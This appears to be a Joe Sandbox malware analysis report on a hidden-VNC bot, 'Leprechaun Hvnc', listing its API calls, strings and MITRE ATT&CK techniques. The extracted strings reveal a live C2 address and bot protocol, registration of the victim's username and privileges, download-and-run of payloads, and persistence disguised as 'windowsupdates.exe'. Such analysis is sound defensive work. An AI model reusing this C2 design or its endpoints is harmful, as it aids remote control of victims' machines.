Function 004912A0 Relevance: 94.8, APIs: 41, Strings: 13, Instructions: 307
memorystringregistryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetProcessHeap.KERNEL32(00000008,00000104,77355E70,76231700,7622F380,?,?,00493503,0049500C), ref: 004912B6
HeapAlloc.KERNEL32(00000000,?,?,00493503,0049500C), ref: 004912BF
GetUserNameW.ADVAPI32(00000000,?), ref: 004912D0
GetProcessHeap.KERNEL32(00000008,00000104), ref: 004912DD
HeapAlloc.KERNEL32(00000000), ref: 004912E0
IsUserAnAdmin.SHELL32 ref: 004912E7
lstrcpyW.KERNEL32(00000000,User), ref: 004912FF
lstrlenW.KERNEL32(00000000), ref: 00491313
lstrlenW.KERNEL32(00000000), ref: 00491318
lstrlenW.KERNEL32(00493503), ref: 0049131F
GetProcessHeap.KERNEL32 ref: 00491329
HeapAlloc.KERNEL32(00000000,00000008,-00000104), ref: 00491333
lstrcpyW.KERNEL32(00000000,/c2.php), ref: 00491341
lstrcatW.KERNEL32(00000000,?action=installnewbot), ref: 00491353
lstrcatW.KERNEL32(00000000,&Username=), ref: 0049135B
lstrcatW.KERNEL32(00000000,00493503), ref: 00491361
lstrcatW.KERNEL32(00000000,&OsVersion=), ref: 00491369
lstrcatW.KERNEL32(00000000,00000000), ref: 0049136D
lstrcatW.KERNEL32(00000000,&Privileges=), ref: 00491375
lstrcatW.KERNEL32(00000000,?), ref: 0049137B
GetProcessHeap.KERNEL32 ref: 0049139B
HeapAlloc.KERNEL32(00000000,00000008,?), ref: 004913A5
RegCreateKeyW.ADVAPI32(80000001,Software\LeprechaunHvnc,0049500C), ref: 004913DE
RegSetKeyValueA.KERNELBASE(0049500C,00000000,00494454,00000001,00000000,00000000), ref: 0049140B
GetProcessHeap.KERNEL32(00000008,00000104), ref: 00491426
HeapAlloc.KERNEL32(00000000), ref: 0049142F
GetModuleFileNameA.KERNEL32(00000000,00000000,00000104), ref: 0049143C
lstrcmpW.KERNEL32(User,?), ref: 0049144A
GetProcessHeap.KERNEL32(00000008,00000104), ref: 0049145F
HeapAlloc.KERNEL32(00000000), ref: 00491462
GetEnvironmentVariableA.KERNEL32(userprofile,00000000,00000104), ref: 00491471
lstrcatA.KERNEL32(00000000,\Documents\WindowsecurityUpdates\), ref: 00491487
CreateDirectoryA.KERNEL32(00000000,00000000), ref: 0049148C
lstrcatA.KERNEL32(00000000,windowsupdates.exe), ref: 00491498
CopyFileA.KERNEL32(00000104,00000000,00000001), ref: 004914A0
RegCreateKeyW.ADVAPI32(80000001,Software\LeprechaunHvnc,0049500C), ref: 004914B4
RegSetKeyValueA.ADVAPI32(0049500C,00000000,windowsupdates,00000001,00000000,00000001), ref: 004914DA
GetProcessHeap.KERNEL32(00000008,-00000002), ref: 00491508
HeapAlloc.KERNEL32(00000000), ref: 0049150F
GetProcessHeap.KERNEL32(00000000,00000000), ref: 0049160F
HeapFree.KERNEL32(00000000), ref: 00491616

Strings

windowsupdates.exe, xrefs: 00491492
\Documents\WindowsecurityUpdates\, xrefs: 00491481
&Username=, xrefs: 00491355
/c2.php, xrefs: 0049133B
?action=installnewbot, xrefs: 0049134D
&Privileges=, xrefs: 0049136F
GET, xrefs: 00491380
userprofile, xrefs: 0049146C
Admin, xrefs: 004912F2
&OsVersion=, xrefs: 00491363
windowsupdates, xrefs: 004914D0
User, xrefs: 004912F9, 00491445
Software\LeprechaunHvnc, xrefs: 004913D4, 004914AA

Memory Dump Source

Source File: 00000000.00000002.3339662977.0000000000491000.00000020.00000001.01000000.00000003.sdmp, Offset: 00490000, based on PE: true

Associated: 00000000.00000002.3339580286.0000000000490000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339693758.0000000000494000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339720251.0000000000496000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_490000_Leprechaun Hvnc.jbxd

Similarity

API ID: Heap$lstrcat$Process$Alloc$Createlstrlen$FileNameUserValuelstrcpy$AdminCopyDirectoryEnvironmentFreeModuleVariablelstrcmp
String ID: &OsVersion=$&Privileges=$&Username=$/c2.php$?action=installnewbot$Admin$GET$Software\LeprechaunHvnc$User$\Documents\WindowsecurityUpdates\$userprofile$windowsupdates$windowsupdates.exe
API String ID: 878550954-16938495
Opcode ID: 318429957e130d49581be5d97a6d9e70c221f96f17f087bd11aaf514644185b1
Instruction ID: 032519ac1669b8fef6846de509b35a9c84f8fd63c7bae39a18be6a44fe486ed1
Opcode Fuzzy Hash: 318429957e130d49581be5d97a6d9e70c221f96f17f087bd11aaf514644185b1
Instruction Fuzzy Hash: 22A12531A00212ABDF205BB4DC48FAE7F78EFD6714F05417AF605A7250EB759842CB58

Function 004919D0 Relevance: 15.1, APIs: 10, Instructions: 83
memoryfilenetworkCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetProcessHeap.KERNEL32(00000008,00000008,77355E70,00000000,7622F380,00493586,00000000), ref: 004919E3
HeapAlloc.KERNEL32(00000000), ref: 004919EC
GetProcessHeap.KERNEL32(00000008,00000800), ref: 004919F7
RtlAllocateHeap.NTDLL(00000000), ref: 004919FA
GetProcessHeap.KERNEL32(00000008,00000001), ref: 00491A05
HeapAlloc.KERNEL32(00000000), ref: 00491A0C
InternetReadFile.WININET(00000800,00000000,00000800,?), ref: 00491A24
GetProcessHeap.KERNEL32 ref: 00491A3E
HeapReAlloc.KERNEL32(00000000,00000008,77355E70,?), ref: 00491A49
InternetReadFile.WININET(00000800,?,00000800,?), ref: 00491A91

Memory Dump Source

Source File: 00000000.00000002.3339662977.0000000000491000.00000020.00000001.01000000.00000003.sdmp, Offset: 00490000, based on PE: true

Associated: 00000000.00000002.3339580286.0000000000490000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339693758.0000000000494000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339720251.0000000000496000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_490000_Leprechaun Hvnc.jbxd

Similarity

API ID: Heap$Process$Alloc$FileInternetRead$Allocate
String ID:
API String ID: 1723587032-0
Opcode ID: a82b47ae2f76702c1a1e4b080b7c8670a8df5c57b5a80c2472aea1f5d2c462fb
Instruction ID: a478f7ee9d7221271b1d1f7bdcf199dd81a03ec2730d8442b64d18761c9093c3
Opcode Fuzzy Hash: a82b47ae2f76702c1a1e4b080b7c8670a8df5c57b5a80c2472aea1f5d2c462fb
Instruction Fuzzy Hash: 4921E731A01204ABDF209FA4DD48F5B7FB8FF91750F1880B6EA049B254CA30EC058B94

Function 004933E0 Relevance: 154.5, APIs: 64, Strings: 24, Instructions: 503
libraryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LoadLibraryW.KERNELBASE(Urlmon.dll), ref: 004933EB
GetStdHandle.KERNEL32(000000F5), ref: 004933F7
WriteConsoleW.KERNEL32(00000000,Faild to load library Urlmondll ,00000021,?,00000000), ref: 0049340B
GetProcAddress.KERNEL32(00000000,URLDownloadToFileW), ref: 0049341E
GetStdHandle.KERNEL32(000000F5), ref: 0049342F
WriteConsoleW.KERNEL32(00000000,Faild to get function address pURLDownloadToFile ,00000032,?,00000000), ref: 00493443

Strings

Faild to get function address pURLDownloadToFile , xrefs: 0049343D
HVNC stop detectd, xrefs: 0049394A
Urlmon.dll, xrefs: 004933E6
Faild to load library Urlmondll , xrefs: 00493405
.exe, xrefs: 004938A5
URLDownloadToFileW, xrefs: 00493418
disabled, xrefs: 0049392D
LeprechaunHvnc, xrefs: 00493450
enabled, xrefs: 00493807
temp, xrefs: 0049387C
/c2.php, xrefs: 0049352D, 00493908, 0049399A
?action=updatecommand&status=finished&botid=, xrefs: 0049391A
GET, xrefs: 00493558, 004939C2
hvnc, xrefs: 00493698, 0049389D
[-] bot is not installed ... , xrefs: 004934E7
Faild to download the file, xrefs: 004938DC
response : , xrefs: 004935D1
task_name, xrefs: 004937C4
[-] Connecting ... , xrefs: 004934B5
HVNC start detectd, xrefs: 00493828
task_command, xrefs: 00493712
task_status, xrefs: 004936D2
?action=fetchcommand&botid=, xrefs: 0049353C, 004939A6
65.20.106.109, xrefs: 00493492

Memory Dump Source

Source File: 00000000.00000002.3339662977.0000000000491000.00000020.00000001.01000000.00000003.sdmp, Offset: 00490000, based on PE: true

Associated: 00000000.00000002.3339580286.0000000000490000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339693758.0000000000494000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339720251.0000000000496000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_490000_Leprechaun Hvnc.jbxd

Similarity

API ID: ConsoleHandleWrite$AddressLibraryLoadProc
String ID: .exe$/c2.php$65.20.106.109$?action=fetchcommand&botid=$?action=updatecommand&status=finished&botid=$Faild to download the file$Faild to get function address pURLDownloadToFile $Faild to load library Urlmondll $GET$HVNC start detectd$HVNC stop detectd$LeprechaunHvnc$URLDownloadToFileW$Urlmon.dll$[-] Connecting ... $[-] bot is not installed ... $disabled$enabled$hvnc$response : $task_command$task_name$task_status$temp
API String ID: 3712223375-459877428
Opcode ID: 44eb854aef874be949c697a41801b202760e45f6a4996b839f16e51c38ce07d6
Instruction ID: e6c4374e9a918cd40c222889cf93ff498b8b9ce941a251bca76b7030492ca887
Opcode Fuzzy Hash: 44eb854aef874be949c697a41801b202760e45f6a4996b839f16e51c38ce07d6
Instruction Fuzzy Hash: D302D371A40204ABDF209FA4DC45F6A7FB8FF99715F10413AFA11A7290D778AD02CB69

Function 004911F0 Relevance: 17.6, APIs: 7, Strings: 3, Instructions: 53
registryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RegOpenKeyW.ADVAPI32(80000001,Software\LeprechaunHvnc,0049500C), ref: 00491204
GetStdHandle.KERNEL32(000000F5,?,?,00493512,0049500C), ref: 00491210
WriteConsoleW.KERNEL32(00000000,Faild to Query key value ,0000001C,?,00000000), ref: 00491224
RegCloseKey.ADVAPI32(0049500C), ref: 0049122D
RegQueryValueExW.KERNELBASE(0049500C,004944DC,00000000,00000001,00493512,00493512), ref: 0049125E
GetStdHandle.KERNEL32(000000F5), ref: 0049126A
RegCloseKey.ADVAPI32(0049500C), ref: 00491282

Strings

Faild to Query key value , xrefs: 00491278
Faild to Open the key , xrefs: 0049121E
Software\LeprechaunHvnc, xrefs: 004911FA

Memory Dump Source

Source File: 00000000.00000002.3339662977.0000000000491000.00000020.00000001.01000000.00000003.sdmp, Offset: 00490000, based on PE: true

Associated: 00000000.00000002.3339580286.0000000000490000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339693758.0000000000494000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339720251.0000000000496000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_490000_Leprechaun Hvnc.jbxd

Similarity

API ID: CloseHandle$ConsoleOpenQueryValueWrite
String ID: Faild to Open the key $Faild to Query key value $Software\LeprechaunHvnc
API String ID: 1921540652-3088589752
Opcode ID: dc2de828a4813b5200bb8fb94588c013ba7b47c004afa38960e84a84fa62e317
Instruction ID: 0a8df900fd61a1cef824a7508b40df29b180df5fefeb1de2d3903aff56e650ac
Opcode Fuzzy Hash: dc2de828a4813b5200bb8fb94588c013ba7b47c004afa38960e84a84fa62e317
Instruction Fuzzy Hash: C0117C31A40208BFEF20DFA0DD0AFAE7B78EB58710F1001B6BB14E11E0D7B59A119B59

Function 00491AB0 Relevance: 14.1, APIs: 4, Strings: 4, Instructions: 56
stringnetworkCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

HttpOpenRequestW.WININET(00494604,00000000,p^5w,00000000,00000000,00000000,00000000,00000000), ref: 00491ADC
lstrcmpW.KERNEL32(00000000,GET), ref: 00491AEE
lstrcmpW.KERNEL32(00000000,POST), ref: 00491B02
HttpSendRequestW.WININET(00000000,00000000,00000000,?,00000000), ref: 00491B19

Strings

p^5w, xrefs: 00491AC7
text/*, xrefs: 00491ACA
GET, xrefs: 00491AE8
POST, xrefs: 00491AFC

Memory Dump Source

Source File: 00000000.00000002.3339662977.0000000000491000.00000020.00000001.01000000.00000003.sdmp, Offset: 00490000, based on PE: true

Associated: 00000000.00000002.3339580286.0000000000490000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339693758.0000000000494000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339720251.0000000000496000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_490000_Leprechaun Hvnc.jbxd

Similarity

API ID: HttpRequestlstrcmp$OpenSend
String ID: GET$POST$p^5w$text/*
API String ID: 1698499804-3758742350
Opcode ID: 12f6a98860d59b06b31302f5e77482e598e937ca835cf03a518309bf5650675c
Instruction ID: a39577706b82475a6c80929caf2b4fb09cae82a166cc67d907f8b7e796c51b56
Opcode Fuzzy Hash: 12f6a98860d59b06b31302f5e77482e598e937ca835cf03a518309bf5650675c
Instruction Fuzzy Hash: 0801923134020A7BDF215F95EC05F6B7FACEB99B15F100076FE04E6290E674981296A9

Function 00491640 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 20
registryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RegOpenKeyW.ADVAPI32(80000001,Software\LeprechaunHvnc,004934D7), ref: 00491652
RegCloseKey.ADVAPI32(004934D7,?,?,004934D7), ref: 0049165F

Strings

Software\LeprechaunHvnc, xrefs: 00491648

Memory Dump Source

Source File: 00000000.00000002.3339662977.0000000000491000.00000020.00000001.01000000.00000003.sdmp, Offset: 00490000, based on PE: true

Associated: 00000000.00000002.3339580286.0000000000490000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339693758.0000000000494000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339720251.0000000000496000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_490000_Leprechaun Hvnc.jbxd

Similarity

API ID: CloseOpen
String ID: Software\LeprechaunHvnc
API String ID: 47109696-1385647368
Opcode ID: ebf5155f76b59a679bb8d37e64101dbf31f68b6082138fb5ff70a420985bfe53
Instruction ID: 388e5c589e1417fd2ef05766d5a9c2d1b0e811f65ed005d7aec0b6c741b71d18
Opcode Fuzzy Hash: ebf5155f76b59a679bb8d37e64101dbf31f68b6082138fb5ff70a420985bfe53
Instruction Fuzzy Hash: 8CD05E3170410CEBDB30CBA0ED05FAA7BACDB95305F1001B6BE0CD1520EA679D2096A9

Function 004919B0 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 7
networkCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

InternetOpenW.WININET(Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.0 Safari/537.36',00000001,00000000,00000000,00000000), ref: 004919BD

Strings

Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.0 Safari/537.36', xrefs: 004919B8

Memory Dump Source

Source File: 00000000.00000002.3339662977.0000000000491000.00000020.00000001.01000000.00000003.sdmp, Offset: 00490000, based on PE: true

Associated: 00000000.00000002.3339580286.0000000000490000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339693758.0000000000494000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339720251.0000000000496000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_490000_Leprechaun Hvnc.jbxd

Similarity

API ID: InternetOpen
String ID: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.0 Safari/537.36'
API String ID: 2038078732-2738514536
Opcode ID: 4488811413c76176e58f3daa125b5816c98e7cf0c6e17ad2faec772d6b369572
Instruction ID: a4f2ea9de029847be208b720be5abefb66646afba170500b1bf0cc8ec5df5162
Opcode Fuzzy Hash: 4488811413c76176e58f3daa125b5816c98e7cf0c6e17ad2faec772d6b369572
Instruction Fuzzy Hash: FBB00170BE5300B7FD3056E0AD5BF4429115790F16F354062B3057C5D095D52042852D

Function 00491990 Relevance: 1.5, APIs: 1, Instructions: 13
networkCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

InternetConnectW.WININET(?,?,00000050,00000000,00000000,00000003,00000000,00000000), ref: 004919A6

Memory Dump Source

Source File: 00000000.00000002.3339662977.0000000000491000.00000020.00000001.01000000.00000003.sdmp, Offset: 00490000, based on PE: true

Associated: 00000000.00000002.3339580286.0000000000490000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339693758.0000000000494000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339720251.0000000000496000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_490000_Leprechaun Hvnc.jbxd

Similarity

API ID: ConnectInternet
String ID:
API String ID: 3050416762-0
Opcode ID: c95b4f69310bc3f7523b8e713e6910b6a42dbca427b6f866c694e38b876de6bc
Instruction ID: dab9c5c2c8f518668ef89a5c18de9f8657345db212a632c82725e8db7397daf9
Opcode Fuzzy Hash: c95b4f69310bc3f7523b8e713e6910b6a42dbca427b6f866c694e38b876de6bc
Instruction Fuzzy Hash: B4D00231290308B7EF211E91DC07F953B19A744B51F104011B71C2C1E086B265615648

Non-executed Functions

Function 00491680 Relevance: 73.8, APIs: 24, Strings: 18, Instructions: 267
memorylibrarystringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LoadLibraryW.KERNEL32(ntdll.dll,00000000), ref: 0049168F
GetProcAddress.KERNEL32(00000000,RtlGetVersion), ref: 004916A3
GetProcessHeap.KERNEL32(00000008,00000104,77355E70), ref: 004916BB
HeapAlloc.KERNEL32(00000000), ref: 004916C2
GetProcessHeap.KERNEL32(00000008,0000011C), ref: 004916FA
HeapAlloc.KERNEL32(00000000), ref: 00491701
VerSetConditionMask.KERNEL32(00000000,00000000,00000080,00000001), ref: 0049174A
VerifyVersionInfoW.KERNEL32(00000000,00000080,00000000), ref: 00491758
lstrcpyW.KERNEL32(00000000,Windows Home Server), ref: 0049178F
lstrcpyW.KERNEL32(00000000,Windows Server 2003), ref: 004917A3

Strings

Windows Server 2012 R2, xrefs: 004917FB
Windows Server 2012, xrefs: 00491840
Windows Vista, xrefs: 004918E5
RtlGetVersion, xrefs: 0049169D
Windows Server 2008 R2, xrefs: 004917D9
Windows 7, xrefs: 004918FE
ntdll.dll, xrefs: 0049168A
Windows Server 2008, xrefs: 004917C0
Windows 8.1, xrefs: 00491930
Windows Server 2022, xrefs: 00491881
Windows 11, xrefs: 00491972
Windows Home Server, xrefs: 00491789
Windows 10, xrefs: 0049195E
Windows xp, xrefs: 004918A5
Windows 8, xrefs: 00491917
Windows Server 2003, xrefs: 0049179D
Windows Server 2019, xrefs: 00491862
Windows XP Professional x64 Edition, xrefs: 004918C2

Memory Dump Source

Source File: 00000000.00000002.3339662977.0000000000491000.00000020.00000001.01000000.00000003.sdmp, Offset: 00490000, based on PE: true

Associated: 00000000.00000002.3339580286.0000000000490000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339693758.0000000000494000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339720251.0000000000496000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_490000_Leprechaun Hvnc.jbxd

Similarity

API ID: Heap$AllocProcesslstrcpy$AddressConditionInfoLibraryLoadMaskProcVerifyVersion
String ID: RtlGetVersion$Windows 10$Windows 11$Windows 7$Windows 8$Windows 8.1$Windows Home Server$Windows Server 2003$Windows Server 2008$Windows Server 2008 R2$Windows Server 2012$Windows Server 2012 R2$Windows Server 2019$Windows Server 2022$Windows Vista$Windows XP Professional x64 Edition$Windows xp$ntdll.dll
API String ID: 1189709698-3794385023
Opcode ID: 7fb5547c65de7e8ed7fd27fc34eb1a78e59c1df0dcc7da122381fa905c24248a
Instruction ID: 7cec6c4b5e36491248f64e88146802816f216f15a2830b8eeffadb7d59a99067
Opcode Fuzzy Hash: 7fb5547c65de7e8ed7fd27fc34eb1a78e59c1df0dcc7da122381fa905c24248a
Instruction Fuzzy Hash: 5B71FA3A7402095BCF305B69EC4AFFA3F68D7D5726F1005B7FA09D2350D67C484A86A9

Function 00491120 Relevance: 29.8, APIs: 15, Strings: 2, Instructions: 92
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetProcessHeap.KERNEL32(00000008,00000044,00000000,?,7622F380,?,?,004938F3,00000000), ref: 00491131
HeapAlloc.KERNEL32(00000000,?,?,004938F3,00000000), ref: 0049113A
GetStdHandle.KERNEL32(000000F5,?,?,004938F3,00000000), ref: 00491144
WriteConsoleA.KERNEL32(00000000,Error: Failed to allocate memory for STARTUPINFOA.,00000032,004938F3,00000000,?,?,004938F3,00000000), ref: 00491157
GetProcessHeap.KERNEL32(00000008,00000010,?,?,004938F3,00000000), ref: 0049116A
HeapAlloc.KERNEL32(00000000,?,?,004938F3,00000000), ref: 0049116D
GetProcessHeap.KERNEL32(00000000,00000000,?,?,004938F3,00000000), ref: 0049117A
HeapFree.KERNEL32(00000000,?,?,004938F3,00000000), ref: 0049117D
GetStdHandle.KERNEL32(000000F5,?,?,004938F3,00000000), ref: 00491185
WriteConsoleA.KERNEL32(00000000,Error: Failed to allocate memory for PROCESS_INFORMATION.,00000039,004938F3,00000000,?,?,004938F3,00000000), ref: 00491198

Strings

Error: Failed to allocate memory for STARTUPINFOA., xrefs: 00491151
Error: Failed to allocate memory for PROCESS_INFORMATION., xrefs: 00491192

Memory Dump Source

Source File: 00000000.00000002.3339662977.0000000000491000.00000020.00000001.01000000.00000003.sdmp, Offset: 00490000, based on PE: true

Associated: 00000000.00000002.3339580286.0000000000490000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339693758.0000000000494000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339720251.0000000000496000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_490000_Leprechaun Hvnc.jbxd

Similarity

API ID: Heap$Process$AllocConsoleHandleWrite$Free
String ID: Error: Failed to allocate memory for PROCESS_INFORMATION.$Error: Failed to allocate memory for STARTUPINFOA.
API String ID: 4149499039-142677882
Opcode ID: 285caa00f38478753cc5f2cfb51da3c49e4aa3488ad738674cbe01693a43dae1
Instruction ID: 19e1f01cabf907939748e861c56aeb984e217420440311f00251cd15dd6a2d54
Opcode Fuzzy Hash: 285caa00f38478753cc5f2cfb51da3c49e4aa3488ad738674cbe01693a43dae1
Instruction Fuzzy Hash: CB219972A84218BBEA2067E9EC4AF9B7B5CEBD9761F100177F704E71D0D5A0590186B4

Description:	Adversaries may interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Tactics:	Execution
Data Sources:	Module: Module Load, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Firewall: Firewall Enumeration, Firewall: Firewall Metadata, Process: OS API Execution, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of valid accounts, usernames, or email addresses on a system or within a compromised environment. This information can help adversaries determine which accounts exist, which can aid in follow-on behavior such as brute-forcing, spear-phishing attacks, or account takeovers (e.g., Valid Accounts ).
Tactics:	Discovery
Data Sources:	Command: Command Execution, File: File Access, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to identify the primary user, currently logged in user, set of users that commonly uses a system, or whether a user is actively using the system. They may do this, for example, by retrieving account usernames or by using OS Credential Dumping . The information may be collected in a number of different ways using other Discovery techniques, because user and username details are prevalent throughout a system and include running process ownership, file/directory ownership, session information, and system logs. Adversaries may use the information from [System Owner/User Discovery](https://attack.mitre.org/techniques/T1033) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp . Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer ).
Tactics:	Command and Control
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report Leprechaun Hvnc.bin.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Configuration

Yara Signatures

Sigma Signatures

Snort Signatures

Joe Sandbox Signatures

AV Detection

Compliance

Networking

System Summary

Data Obfuscation

Malware Analysis System Evasion

Anti Debugging

Language, Device and Operating System Detection

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

Static File Info

General

File Icon

Static PE Info

General

Entrypoint Preview

Data Directories

Sections

Imports

Network Behavior

TCP Packets

HTTP Request Dependency Graph

HTTP Packets

Statistics

CPU Usage

Memory Usage

High Level Behavior Distribution

back

System Behavior

Analysis Process: Leprechaun Hvnc.bin.exePID: 6892, Parent PID: 4004

General

File Activities

File Opened

File Created

File Attributes Queried

Other File Operations

Volume Information Queried

Windows Analysis Report
Leprechaun Hvnc.bin.exe

Function 004912A0 Relevance: 94.8, APIs: 41, Strings: 13, Instructions: 307
memorystringregistryCOMMON

Function 004919D0 Relevance: 15.1, APIs: 10, Instructions: 83
memoryfilenetworkCOMMON

Function 004933E0 Relevance: 154.5, APIs: 64, Strings: 24, Instructions: 503
libraryloaderCOMMON

Function 004911F0 Relevance: 17.6, APIs: 7, Strings: 3, Instructions: 53
registryCOMMON

Function 00491AB0 Relevance: 14.1, APIs: 4, Strings: 4, Instructions: 56
stringnetworkCOMMON

Function 00491640 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 20
registryCOMMON

